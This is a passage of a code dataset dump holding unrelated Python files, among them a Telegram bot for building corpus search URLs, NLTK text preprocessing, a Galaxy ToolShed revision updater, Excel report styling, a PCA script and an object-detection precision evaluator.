lst_obj.append(obj)\n print(lst_obj)\n return jsonify(lst_obj)\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0' , port=5000 , debug=\"True\")\n\n","sub_path":"flaskapp.py","file_name":"flaskapp.py","file_ext":"py","file_size_in_byte":3698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"414891795","text":"#! 
/usr/bin/env python3\n\nfrom __future__ import print_function\nimport sys\nimport os\nimport subprocess\n\n\ndef main(args):\n\tfile = open(args[1])\n\tlines = [l for l in file.readlines()]\n\tdef mapper(strr):\n\t\ttry: \n\t\t\treturn hex(int(strr, 2))[2:]\n\t\texcept Exception: \n\t\t\treturn 'x'\n\tresults = []\n\tfor l in lines:\n\t\thexes = list(map(mapper,l.split()))\n\t\tra = ''.join(hexes[:8])\n\t\tsp = ''.join(hexes[8:16])\n\t\tt0 = ''.join(hexes[16:24])\n\t\tt1 = ''.join(hexes[24:32])\n\t\tt2 = ''.join(hexes[32:40])\n\t\ts0 = ''.join(hexes[40:48])\n\t\ts1 = ''.join(hexes[48:56])\n\t\ta0 = ''.join(hexes[56:64])\n\t\tfetchAddr = ''.join(hexes[64:72])\n\t\tinst = ''.join(hexes[72:80])\n\t\ttime_step = ''.join(hexes[80:84])\n\t\tresult = [\"ra: \", ra, \"sp: \", sp, \"t0: \", t0, \"t1: \", t1, \"t2: \", t2, \"s0: \", s0, \"s1: \", s1, \"a0: \", a0, \n\t\t\t\t\"PC: \", fetchAddr, \"inst: \", inst, \"Time_Step: \", time_step]\n\t\tresults.append(result) \n\tfor i in range(len(results)):\n\t\tstring2 = ' '.join(results[i])\n\t\tprint(string2)\n\nif __name__ == \"__main__\":\n\tmain(sys.argv)\n","sub_path":"proj3/binary_to_hex.py","file_name":"binary_to_hex.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"182489914","text":"from flask import redirect, url_for\n\nfrom lib.controllers import BaseController, render, admin_required\nfrom app.models import *\nfrom app.forms.forum import ForumForm\n\n\nclass ForumsController(BaseController):\n @render\n def index(self):\n self.forums = Forum.query.all()\n\n @render\n def show(self):\n self.forum = Forum.query.get_or_404(self.params['forum_id'])\n\n @admin_required\n @render\n def new(self):\n self.form = getattr(self, 'form', None) or ForumForm()\n\n @admin_required\n @render\n def edit(self):\n self.forum = Forum.query.get_or_404(self.params['forum_id'])\n self.form = getattr(self, 'form', None) or ForumForm(obj=self.forum)\n\n @admin_required\n def create(self):\n self.form = ForumForm()\n if self.form.validate_on_submit():\n del self.form\n forum = Forum.create(user_id=self.current_user.id, **self._forum_params())\n return redirect(url_for('forums.show', forum_id=forum.id))\n else:\n return self.new()\n\n @admin_required\n def update(self):\n self.form = ForumForm()\n if self.form.validate_on_submit():\n del self.form\n forum = Forum.query.get_or_404(self.params['forum_id'])\n forum.update(**self._forum_params())\n return redirect(url_for('forums.show', forum_id=forum.id))\n else:\n return self.edit()\n\n @admin_required\n def destroy(self):\n forum = Forum.query.get_or_404(self.params['forum_id'])\n forum.delete()\n return redirect(url_for('forums.index'))\n\n def _forum_params(self):\n return self.permit(self.params, 'position', 'title')\n","sub_path":"app/controllers/forums.py","file_name":"forums.py","file_ext":"py","file_size_in_byte":1692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"148592141","text":"# -*- coding: utf-8 -*-\n# импортируем модули\nimport telebot\nimport conf\nimport random\nimport shelve\nfrom telebot import types\nimport urllib.parse\nbot = telebot.TeleBot(conf.TOKEN, threaded=False)\nshelve_name = './shelve.db'\n\n#exact form\norder_of_arguments_exact = 'http://search2.ruscorpora.ru/search.xml?env=alpha&mycorp=&mysent=&mysize=&mysentsize=&mydocsize=&dpp=&spp=&spd=&text=lexform&mode=main&sort=&lang=ru&nodia=1&req='\ndef set_request_exact (word):\n word = 
word.encode ('cp1251')\n word = urllib.parse.quote (word,safe='')\n #word = urllib.urlencode (word)\n string = order_of_arguments_exact + word\n #string = urllib.parse.quote(string)\n return (string)\ndef request_exact (word):\n string = set_request_exact (word)\n return string\n# full\nfirst = 'http://search2.ruscorpora.ru/search.xml?env=alpha&mycorp=&mysent=&mysize=&mysentsize=&mydocsize=&spd=&text=lexgramm&mode=main&sort=gr_tagging&lang=ru&nodia=1'\nd1 = {'parent1':'0','level1':'0','lex1':'','gramm1':'()','sem1':'sem2','sem-mod1':'','flags1':'','m1':''}\nadditional = {'parent':'0','level':'0','min':'1','max':'1','lex':'()','gramm':'()','sem':'','sem-mod':'sem2'}\nmatch = {'pos':'gramm'}\n#\nrequest_dict = {}\nhow_many = 1\ncurrent = 1\n#\ndef set_some_additional_set (i):\n d = {}\n for w in additional:\n d[w+str(i)]= additional[w]\n return d\n\ndef set_request_as_null ():\n global current, how_many, request_dict\n how_many = 1\n current = 1\n request_dict = d1\n d = set_some_additional_set (2)\n for i in d:\n request_dict[i] = d[i]\n return request_dict\n\nrequest_dict = set_request_as_null ()\nprint (request_dict)\n\ndef add_some (cur):\n global current, how_many, request_dict\n d = set_some_additional_set (cur)\n for i in d:\n request_dict[i] = d[i]\n d = set_some_additional_set (cur+1)\n for i in d:\n request_dict[i] = d[i]\n\ndef upd_user_request(i, p):\n global current, how_many, request_dict\n if current > how_many:\n add_some(current)\n where = match[i]+str (current)\n print (where)\n if '(' in request_dict[where]:\n request_dict[where] = request_dict[where][:-1]+'|'+p+')'\n else:\n request_dict[where] = p\n#\n\ndef add_all (f, keyboard, d, name):\n for line in f:\n arr = []\n i = line.split ('\\t')\n i[0] = '- '+i[0]+' -'\n keyboard_POS.add(types.KeyboardButton(text = i[0]))\n d[i[0]] = i[1].strip ('\\n')\n arr.append(i[0])\n keyboard_POS.add (types.KeyboardButton(text = 'сбросить'),\n types.KeyboardButton(text = 'завершить выбор'))\n return keyboard,d,arr\n \n#keyboards for param.\nf = open ('.\\\\keyboards\\\\pos.txt','r',encoding = 'utf-8')\nkeyboard_POS = types.ReplyKeyboardMarkup()\nd_POS = {}\nkeyboard_POS,d_POS,arr_POS = add_all (f, keyboard_POS, d_POS,'pos')\nf.close()\n\n\n#\nkeyboards = {'pos':keyboard_POS}\nmsgs = {'pos': \"Выберите часть речи:\"}\nparams = {'pos':d_POS}\ncomm = ['pos']\n#\nkeyboard_GENERAL = types.ReplyKeyboardMarkup()\nkeyboard_GENERAL.add(types.KeyboardButton(text = '/newsearch'),\n types.KeyboardButton(text = '/setNofword'),\n types.KeyboardButton(text = '/runsearch'))\nf.close()\n#\nall_params = set ()\nfor i in params:\n for w in params[i]:\n all_params.add(w)\n#print (all_params)\n#\ndef get_params(message, i):\n keyboard = keyboards[i]\n bot.send_message(message.chat.id, msgs[i], reply_markup=keyboard)\n#\ndef search_for_params(message):\n if message.text in all_params:\n return True\n else:\n return False\n\ndef set_params (message):\n w = message.text\n for i in params:\n try:\n #print (params[i][w])\n p = params[i][w]\n ii = i\n break\n except:\n continue\n return p, ii\n####################################################################################33\n# COMPLEX SEARCH\ndef create_url ():\n url = first\n for w in request_dict:\n url = url + w+'='+request_dict[w]+'&'\n url = url [:-1]\n print (url)\n return url\n\n\n# этот обработчик запускает функцию send_welcome, когда пользователь отправляет команду /help\n@bot.message_handler(commands=['help','start','newsearch'])\ndef send_welcome(message):\n set_request_as_null ()\n 
bot.send_message(message.chat.id, '/pos часть речи')\n \n\n@bot.message_handler(commands=['exact'])\ndef send_exact(message):\n word = str (message.text)[7:]\n rqst = request_exact (word)\n bot.send_message(message.chat.id, rqst)\n\n@bot.message_handler(commands=['complex'])\ndef send_complex(message):\n params_text = '/pos часть речи\\n/setNofword какое слово в запросе определить'\n bot.send_message(message.chat.id, params_text)\n\n@bot.message_handler(commands=['setNofword'])\ndef send_complex(message):\n global current, how_many, request_dict\n if len (message.text)<12:\n bot.send_message(message.chat.id, 'Задайте так:\\n/setNofword <ваше число>')\n else:\n try:\n w = int (message.text[11:])\n current = w\n except:\n bot.send_message(message.chat.id, 'Задайте так:\\n/setNofword <ваше число>')\n# !!!!!!!!!!!!!!\n@bot.message_handler(commands=comm)\ndef show_keyboard (message):\n get_params(message,message.text[1:])\n#\n@bot.message_handler(func=search_for_params)\ndef get_p (message):\n p, i = set_params (message)\n upd_user_request(i, p)\n bot.send_message(message.chat.id, msgs[i], reply_markup=keyboard_GENERAL)\n\n@bot.message_handler(commands=['runsearch'])\ndef send_complex(message):\n url = create_url ()\n bot.send_message(message.chat.id, url)\n\n\nif __name__ == '__main__':\n bot.polling(none_stop=True)\n","sub_path":"nkrya_test/nkrya_bot 1_0.py","file_name":"nkrya_bot 1_0.py","file_ext":"py","file_size_in_byte":5854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"262472923","text":"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n\nIn this file, we will implement the basic steps of text preprocessing.\nThese steps are needed for transferring text from human language to machine-readable format \nfor further processing.\nText normalization includes:\n * converting all letters to lower or upper case\n * converting numbers into words or removing numbers\n * removing punctuations, accent marks and other diacritics\n * removing white spaces\n * expanding abbreviations\n * removing stop words, sparse terms, and particular words\n * text canonicalization\n\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\nimport re\nfrom nltk import pos_tag, ne_chunk, RegexpParser\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\nfrom nltk.stem import WordNetLemmatizer\nfrom textblob import TextBlob\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nimport pandas as pd\n\ndef txt_prepration(s: str):\n # try:\n rmv_numbers = re.sub(r'\\d+', '', s) # removing digits\n low = rmv_numbers.lower() # changed all uppercase letters to lower cases\n rmv_symbols = re.sub(r'[^\\w]', ' ', low) # removing symbols\n rmv_spaces = rmv_symbols.strip() # removing Enter Spaces (White Spaces)\n\n stop_words = set(stopwords.words('english')) # removing stop words\n tokens = word_tokenize(rmv_spaces) #\n rmv_stops = [i for i in tokens if not i in stop_words] #\n\n lemmatizer = WordNetLemmatizer() # lemmatization = converting to simple form of words\n lem_str = []\n for word in rmv_stops:\n lem_str.append(lemmatizer.lemmatize(word))\n\n\n s = ' '.join(lem_str) # Chunking (shallow parsing)\n tblob = TextBlob(s)\n tmp = list(str(tblob).split(\" \"))\n #print('value = {}\\n' .format(result1))\n return tmp\n\ndef parse_tree(tokens):\n reg_exp = \"NP: { < DT >? 
< JJ > * < NN >}\"\n rp = RegexpParser(reg_exp)\n result = rp.parse(tokens)\n result.draw()\n\ndef database_txt_parsed(db):\n num =0\n device_name = db['name']\n device_description = db['description']\n parsed_name = []\n parsed_description = []\n\n for dn in device_name:\n num +=1\n parsed_name.append(txt_prepration(dn,num))\n\n for dn in device_description:\n num +=1\n parsed_description.append(txt_prepration(dn,num))\n\n return parsed_name, parsed_description\n\ndef tf_idf (list_of_strings):\n vectorizer = TfidfVectorizer()\n vectors = vectorizer.fit_transform(list_of_strings)\n feature_names = vectorizer.get_feature_names()\n dense = vectors.todense()\n denselist = dense.tolist()\n df = pd.DataFrame(denselist, columns=feature_names)\n return df\n\ndef text_dic_evaluation(txt, dic):\n prepared_txt = txt_prepration(txt)\n paper_score = 0\n words = dic.iloc[:,0]\n scors = dic.iloc[:,1]\n\n for w in range(len(words)):\n if words.iloc[w] in prepared_txt:\n paper_score += scors.iloc[w]\n return (paper_score)","sub_path":"text_processing.py","file_name":"text_processing.py","file_ext":"py","file_size_in_byte":2909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"403207816","text":"class Solution:\n # @param {integer[]} nums\n # @param {integer} target\n # @return {integer[]}\n def twoSum1(self, nums, target):\n \tlnums = len(nums)\n \tfor i in xrange(lnums):\n \t\tfor j in xrange(i+1,lnums):\n \t\t\tif nums[i] + nums[j] == target:\n \t\t\t\tif nums[i] <= nums[j]:\n \t\t\t\t\treturn [i + 1, j + 1]\n \t\t\t\telse:\n \t\t\t\t\treturn [j + 1, i + 1]\n\n def twoSum2(self, nums, target):\n \tdnums = dict()\n \tfor i in xrange(len(nums)):\n \t\tif target - nums[i] in dnums:\n \t\t\treturn (dnums[target - nums[i]] + 1, i + 1)\n \t\tdnums[nums[i]] = i\n","sub_path":"001 Two_Sum/001 Two_Sum.py","file_name":"001 Two_Sum.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"339195608","text":"import os\nimport sys\nimport yaml\nfrom bioblend import toolshed\n\n\"\"\"\nA simple program to update the tool revisions in a tools.yml file.\n\nThe program will either replace the list of revisions with just the latest\nrevision available on the ToolShed, or append the latest revision (if a newer\nrevision is available) to the existing list of revisions.\n\nNOTE: The program doesn't (can't) actually check if an available revision is\n\"newer\" than the current revision, just if they have differnt SHA values. If\nthe revisions are different it is assumed that the version on the ToolShed is\nnewer.\n\nUSAGE:\n\npython .github/scripts/update_tools.py [append|replace] ./production/anvil/tools.yml /path/to/write.yml\n\"\"\"\n\nDEFAULT_TOOLSHED = 'https://toolshed.g2.bx.psu.edu'\n\n# Common keys into the tools dict. 
Defined solely so our IDE can do completions\n# and I don't consistently misspell revisisions or have to remember if it is\n# toolshed_url or tool_shed_url\nNAME = 'name'\nOWNER = 'owner'\nTOOLS = 'tools'\nSHED = 'tool_shed_url'\nREVISIONS = 'revisions'\n\n# The toolsheds that we have already connected to.\ntool_sheds = { DEFAULT_TOOLSHED: toolshed.ToolShedInstance(DEFAULT_TOOLSHED) }\n\ndef validate(tool):\n \"\"\"Ensure the tool has the fields we need so we don't need to check later.\"\"\"\n if SHED not in tool:\n tool[SHED] = DEFAULT_TOOLSHED\n if REVISIONS not in tool:\n tool[REVISIONS] = []\n\ndef append(tool, revision):\n if revision not in tool[REVISIONS]:\n tool[REVISIONS].append(revision)\n\ndef replace(tool, revision):\n tool[REVISIONS] = [ revision ]\n\ndef update_file(add_to_list, infile, outfile):\n with open(infile, \"r\") as f:\n data = yaml.safe_load(f)\n\n tool_list = data[TOOLS]\n for tool in tool_list:\n print(f\"Getting latest revision for {tool[NAME]}\")\n validate(tool)\n url = tool[SHED]\n if url in tool_sheds:\n ts = tool_sheds[url]\n else:\n ts = toolshed.ToolShedInstance(url)\n tool_sheds[url] = ts\n revs = ts.repositories.get_ordered_installable_revisions(tool[NAME], tool[OWNER])\n if revs and len(revs) > 0:\n add_to_list(tool, revs[-1])\n\n data = { \"tools\": tool_list }\n with open(outfile, \"w\") as f:\n yaml.dump(data, f, default_flow_style=False)\n\nif __name__ == '__main__':\n # Very very simple command line parsing.\n if len(sys.argv) != 4:\n print(f\"ERROR: Expected 3 parameters but found {len(sys.argv)-1}\")\n print(f\"USAGE: python {sys.argv[0]} [append|replace] \")\n sys.exit(1)\n\n mode = None\n if sys.argv[1] == 'append':\n mode = append\n elif sys.argv[1] == 'replace':\n mode = replace\n else:\n print(f\"Invalid mode: {sys.argv[1]}\")\n print(\"Must be one of append or replace\")\n sys.exit(1)\n\n infile = sys.argv[2]\n outfile = sys.argv[3]\n if not os.path.exists(infile):\n print(f\"Could not find the input file {infile}\")\n sys.exit(1)\n\n update_file(mode, infile, outfile)\n","sub_path":".github/scripts/update_tools.py","file_name":"update_tools.py","file_ext":"py","file_size_in_byte":3038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"45545877","text":"class Solution:\n def maxProduct(self, A: List[int]) -> int:\n res = A[0]\n min_ = res\n max_ = res\n \n for i in range(1, len(A)):\n if A[i] < 0:\n min_, max_ = max_, min_\n \n max_ = max(A[i], max_ * A[i])\n min_ = min(A[i], min_ * A[i])\n res = max(max_, res)\n return res","sub_path":"LC152MaximumProductSubarray.py","file_name":"LC152MaximumProductSubarray.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"625508531","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport netifaces\nimport sys\n\n#####\nclass ipaddr:\n def __init__(self):\n self._ip = {}\n self._if_name = []\n self._ip_addr = []\n \n for ifn in netifaces.interfaces():\n if ifn == 'lo':\n continue\n \n ifaddrs = netifaces.ifaddresses(ifn)\n\n try:\n ip = ifaddrs[netifaces.AF_INET]\n except(KeyError):\n continue\n\n self._if_name.append(ifn)\n \n self._ip[ifn] = []\n for addr in ip:\n ip1 = addr['addr']\n self._ip[ifn].append(ip1)\n self._ip_addr.append(ip1)\n\n def if_name(self, num=0):\n return self._if_name[num]\n\n def ip_addr(self, num=0):\n return self._ip_addr[num]\n\n def print(self):\n print(self._ip)\n print(self._if_name)\n print(self._ip_addr)\n 
\n##### Main\ndef main():\n sys.argv.pop(0)\n ip=ipaddr()\n #ip.print()\n print(ip.ip_addr())\n\nif __name__ == '__main__':\n main()\n","sub_path":"ipaddr.py","file_name":"ipaddr.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"64078961","text":"'''\nCreated on Feb 28, 2014\n\n@author: theo\n'''\nfrom django.utils.text import slugify\nfrom acacia import settings\n\ndef project_upload(instance, filename):\n return '/'.join(['images',\n slugify(instance.name), \n filename])\n\ndef locatie_upload(instance, filename):\n return '/'.join(['images',\n slugify(instance.project.name), \n slugify(instance.name), \n filename])\n\ndef meetlocatie_upload(instance, filename):\n return '/'.join(['images',\n slugify(instance.project.name), \n slugify(instance.projectlocatie.name), \n slugify(instance.name), \n filename])\n\ndef sourcefile_upload(instance, filename):\n try:\n sourcefile = instance\n datasource = sourcefile.datasource\n meetlocatie = datasource.meetlocatie\n projectlocatie = meetlocatie.projectlocatie\n project = projectlocatie.project\n return '/'.join([slugify(project.name), \n slugify(projectlocatie.name), \n slugify(meetlocatie.name), \n settings.UPLOAD_DATAFILES,\n slugify(datasource.name), \n filename])\n except:\n return '/'.join([settings.UPLOAD_THUMBNAILS, 'files', str(instance.pk), filename])\n \ndef param_thumb_upload(instance, filename):\n try:\n parameter = instance\n datasource = parameter.datasource\n meetlocatie = datasource.meetlocatie\n projectlocatie = meetlocatie.projectlocatie\n project = projectlocatie.project\n return '/'.join([\n slugify(project.name),\n slugify(projectlocatie.name),\n slugify(meetlocatie.name),\n settings.UPLOAD_THUMBNAILS, \n slugify(datasource.name),\n 'parameter', \n filename])\n except:\n return '/'.join([settings.UPLOAD_THUMBNAILS, 'parameter', str(instance.pk), filename])\n \ndef series_thumb_upload(instance, filename):\n try:\n datasource = instance.datasource()\n meetlocatie = instance.meetlocatie()\n projectlocatie = instance.projectlocatie()\n project = instance.project()\n return '/'.join([slugify(project.name),\n slugify(projectlocatie.name),\n slugify(meetlocatie.name),\n settings.UPLOAD_THUMBNAILS, \n slugify(datasource.name),\n 'series', \n filename])\n except:\n return '/'.join([settings.UPLOAD_THUMBNAILS, 'series', str(instance.pk), filename])\n ","sub_path":"acacia/data/upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":2799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"648566405","text":"from openpyxl import Workbook\nfrom openpyxl import load_workbook\nfrom openpyxl.styles import Alignment, Font\nfrom openpyxl.styles import Border, colors, PatternFill, Side\nimport sys\n\ncolumnSet = ['B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q']\n\ndef InitFixText(worksheet,Data):\n Year = Data[0]\n Month = Data[1]\n worksheet['B1'] = 'สถิติจำนวน Specimen ประจำเดือน '+ListMonth(Month)+' ปี '+ str(Year)\n Header = ['Heparin/Clot Blood','Clot Blood','Heparin','EDTA','Citrate','ACD','Heparin Whole blood','NaF','กระป๋อง Urine','กระป๋อง Stool','ขวด sterile','ขวด Hemo culture','ขวด Thin prep','Biopsy / Cytology','Other']\n for idx, colH in enumerate(Header):\n worksheet.cell(row=2, column=idx+2).value = colH\n worksheet['A2'] = 'Location\\Sample Type'\n return worksheet\n\ndef InitPosition(worksheet):\n worksheet['B1'].alignment = StyleSheet('AliignMid')\n 
worksheet['A2'].alignment = StyleSheet('AliignMid')\n for idx in range(17):\n worksheet.cell(row=2, column=idx+1).alignment = StyleSheet('AliignMid')\n return worksheet\n\ndef initSize(worksheet):\n worksheet.column_dimensions['A'].width = 40\n wideSet = [13,13,10,8,9,8,10,6,10,10,8,10,8,11,8,10]\n for idx,i in enumerate(columnSet):\n worksheet.column_dimensions[i].width = wideSet[idx]\n #worksheet.column_dimensions['Q'].width = 16\n worksheet.row_dimensions[1].height = 20\n worksheet.row_dimensions[2].height = 60\n return worksheet\n\ndef initMerge(worksheet):\n worksheet.merge_cells('B1:P1')\n return worksheet\n\ndef initFill(worksheet):\n worksheet['B1'].fill = StyleSheet('FillYellow')\n for idx in range(1,17):\n worksheet.cell(row=2, column=idx+1).fill = StyleSheet('FillGray')\n return worksheet\n\ndef initFont(worksheet, sourceCount):\n worksheet['B1'].font = StyleSheet('FontHead')\n newColumnSet = ['A'] + columnSet\n targetRow = 2\n for i in newColumnSet:\n tar = i + str(targetRow)\n worksheet[tar].font = StyleSheet('FontHead')\n FontArea(worksheet, 1, 17, 3, 3+sourceCount)\n return worksheet\n\ndef initBorder(worksheet,sourceCount):\n StrokeBorder(worksheet, 1, 18, 1, 3+sourceCount)\n return worksheet\n\ndef HighLightGrp(worksheet, sourceGroupList, sourceCount):\n for row in range(3, 3+sourceCount):\n if worksheet.cell(row=row, column=1).value in sourceGroupList:\n worksheet.cell(row=row, column=1).value = worksheet.cell(row=row, column=1).value + \" (Group)\"\n worksheet.cell(row=row, column=1).fill = StyleSheet('FillYellow')\n return worksheet\n\ndef StrokeBorder(workSheet, min_X, max_X, min_Y, max_Y):\n min_X -= 1\n max_X -= 1\n min_Y -= 1\n max_Y -= 1\n BorderStyle = StyleSheet('BorderNor')\n for i, row in enumerate(workSheet):\n if min_Y <= i <= max_Y:\n for j, cell in enumerate(row):\n if min_X <= j <= max_X:\n cell.border = BorderStyle\n return workSheet\n\ndef StyleSheet(key):\n StyleDict = {}\n StyleDict['AliignMid'] = Alignment(horizontal=\"center\",vertical=\"center\",wrap_text=True)\n StyleDict['FillGray'] = PatternFill(start_color='f2f2f2', fill_type='solid')\n StyleDict['FillPurple'] = PatternFill(start_color='ccd9ff', fill_type='solid')\n StyleDict['BorderNor'] = Border(top = Side(border_style='thin', color='FF000000'), \n right = Side(border_style='thin', color='FF000000'), \n bottom = Side(border_style='thin', color='FF000000'),\n left = Side(border_style='thin', color='FF000000'))\n StyleDict['BorderNor_Left'] = Border(left = Side(border_style='thin', color='FF000000'))\n StyleDict['FillYellow'] = PatternFill(start_color='FFFF00', fill_type='solid')\n StyleDict['FontHead'] = Font(name = 'TH SarabunPSK', size = 14, bold = False)\n StyleDict['FontText'] = Font(name = 'TH SarabunPSK', size = 14, bold = False)\n return StyleDict[key]\n\ndef ListMonth(i):\n #month = ['January', 'February', 'March', 'April', 'May', 'June', 'July', 'August', 'September', 'October', 'November', 'December'] \n month = ['มกราคม', 'กุมภาพันธ์', 'มีนาคม', 'เมษายน', 'พฤษภาคม', 'มิถุนายน', 'กรกฎาคม', 'สิงหาคม', 'กันยายน', 'ตุลาคม', 'พฤศจิกายน', 'ธันวาคม'] \n return month[int(i)-1]\n\ndef FontArea(workSheet, min_X, max_X, min_Y, max_Y):\n min_X -= 1;max_X -= 1;min_Y -= 1;max_Y -= 1\n for i, row in enumerate(workSheet):\n if min_Y <= i <= max_Y:\n for j, cell in enumerate(row):\n if min_X <= j <= max_X:\n cell.font = StyleSheet('FontText')\n return 
workSheet\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Model/Design.py","file_name":"Design.py","file_ext":"py","file_size_in_byte":4883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"269549915","text":"import pandas as pd \r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.decomposition import PCA\r\nfrom sklearn.preprocessing import StandardScaler\r\n\r\n\r\n\r\ndf = pd.read_csv('data1.csv', skiprows = 2 ,names=['Labels','Feature 1','Feature 2','Feature 3','Feature 4','Feature 5','Feature 6','Feature 7','Feature 8','Feature 9','Feature 10'])\r\n\r\nfeatures = ['Feature 1','Feature 2','Feature 3','Feature 4','Feature 5','Feature 6','Feature 7','Feature 8','Feature 9','Feature 10']\r\nx = df.loc[:, features].values\r\ny = df.loc[:, ['Labels']].values\r\nx = StandardScaler().fit_transform(x)\r\n\r\npd.DataFrame(data = x, columns = features).head()\r\n\r\npca = PCA()\r\npca.fit_transform(x)\r\nexplained_variance=pca.explained_variance_ratio_\r\nprint(\"The explained variance matrix shows the variance ratios of each component among all the features given. It is printed below\")\r\nfor k in range(0,10):\r\n print(\"Explained variance of FEATURE-{} is {}\".format(k+1,explained_variance[k]))\r\n\r\npca2 = PCA(n_components=2)\r\npca.fit_transform(x)\r\nexplained_variance_best=pca.explained_variance_ratio_ \r\nprint(\"Seting the number of components to two we get the variance ratios of the two features which classify the labels best or hold max percentage of the data\")\r\nfor k in range(0,2):\r\n print(\"Explained variance of BEST FEATURE-{} is {}\".format(k+1,explained_variance_best[k]))\r\n\r\nprint(\"Since the variance ratios of the best features matches with that of FEATURE 1 and FEATURE 2 we conclude that Feature 1 and Feature 2 classify the two levels best and this what is also observed graphically\")\r\n","sub_path":"SRICHANDAN DASH_180102089/PCAcode.py","file_name":"PCAcode.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"336786132","text":"###########################################################################################\n# #\n# This sample shows how to evaluate object detections applying the following metrics: #\n# * Precision x Recall curve ----> used by VOC PASCAL 2012) #\n# * Average Precision (AP) ----> used by VOC PASCAL 2012) #\n# #\n# Developed by: Rafael Padilla (rafael.padilla@smt.ufrj.br) #\n# SMT - Signal Multimedia and Telecommunications Lab #\n# COPPE - Universidade Federal do Rio de Janeiro #\n# Last modification: Oct 9th 2018\n#\n# Adapted and modified by: Christophe Karam #\n###########################################################################################\n\nimport glob\nimport os\nimport shutil\nimport sys\n\nfrom BoundingBox import BoundingBox\nfrom BoundingBoxes import BoundingBoxes\nfrom Evaluator import *\nfrom utils import BBFormat\n\n\n# Validate formats\ndef ValidateFormats(label_format):\n if label_format == 'xywh':\n return BBFormat.XYWH\n elif label_format == 'xyrb':\n return BBFormat.XYX2Y2\n elif label_format is None:\n return BBFormat.XYWH # default when nothing is passed\n else:\n print('Input label format {:s} is invalid.'.format(label_format))\n\ndef getBoundingBoxes(directory, isGT, bbFormat, allBoundingBoxes=None, allClasses=None):\n \"\"\"Read txt files containing bounding boxes (ground truth and detections).\"\"\"\n coordType = CoordinatesType.Absolute\n imgSize = 
(0, 0)\n if allBoundingBoxes is None:\n allBoundingBoxes = BoundingBoxes()\n if allClasses is None:\n allClasses = []\n # Read ground truths\n os.chdir(directory)\n files = glob.glob(\"*.txt\")\n files.sort()\n # Read GT detections from txt file\n # Each line of the files in the groundtruths folder represents a ground truth bounding box\n # (bounding boxes that a detector should detect)\n # Each value of each line is \"class_id, x, y, width, height\" respectively\n # Class_id represents the class of the bounding box\n # x, y represents the most top-left coordinates of the bounding box\n # x2, y2 represents the most bottom-right coordinates of the bounding box\n for f in files:\n nameOfImage = f.replace(\".txt\", \"\")\n fh1 = open(f, \"r\")\n for line in fh1:\n line = line.replace(\"\\n\", \"\")\n if line.replace(' ', '') == '':\n continue\n splitLine = line.split(\" \")\n if isGT:\n idClass = (splitLine[0]) # class\n x = float(splitLine[1])\n y = float(splitLine[2])\n w = float(splitLine[3])\n h = float(splitLine[4])\n bb = BoundingBox(\n nameOfImage,\n idClass,\n x,\n y,\n w,\n h,\n coordType,\n imgSize,\n BBType.GroundTruth,\n format=bbFormat)\n else:\n idClass = (splitLine[0]) # class\n confidence = float(splitLine[1])\n x = float(splitLine[2])\n y = float(splitLine[3])\n w = float(splitLine[4])\n h = float(splitLine[5])\n bb = BoundingBox(\n nameOfImage,\n idClass,\n x,\n y,\n w,\n h,\n coordType,\n imgSize,\n BBType.Detected,\n confidence,\n format=bbFormat)\n allBoundingBoxes.addBoundingBox(bb)\n if idClass not in allClasses:\n allClasses.append(idClass)\n fh1.close()\n return allBoundingBoxes, allClasses\n\ndef calculate(iou_thresh, gtFolder, detFolder, savePath):\n\n if os.path.exists(gtFolder) is False:\n print('Ground truth directory does not exist. Exiting...')\n sys.exit(0)\n\n if os.path.exists(detFolder) is False:\n print('Prediction directory does not exist. 
Exiting...')\n sys.exit(0)\n\n if os.path.exists(savePath) is False:\n os.makedirs(savePath)\n\n gtFormat = BBFormat.XYX2Y2\n detFormat = BBFormat.XYX2Y2\n\n # Get groundtruth boxes\n allBoundingBoxes, allClasses = getBoundingBoxes(gtFolder, True, gtFormat)\n # Get detected boxes\n allBoundingBoxes, allClasses = getBoundingBoxes(detFolder, False, detFormat, allBoundingBoxes, allClasses)\n allClasses.sort()\n\n evaluator = Evaluator()\n acc_AP = 0\n validClasses = 0\n\n # Plot Precision x Recall curve\n detections = evaluator.PlotPrecisionRecallCurve(\n allBoundingBoxes, # Object containing all bounding boxes (ground truths and detections)\n IOUThreshold=iou_thresh, # IOU threshold\n method=MethodAveragePrecision.EveryPointInterpolation,\n showAP=True, # Show Average Precision in the title of the plot\n showInterpolatedPrecision=False, # Don't plot the interpolated precision curve\n savePath=savePath,\n showGraphic=False)\n\n f = 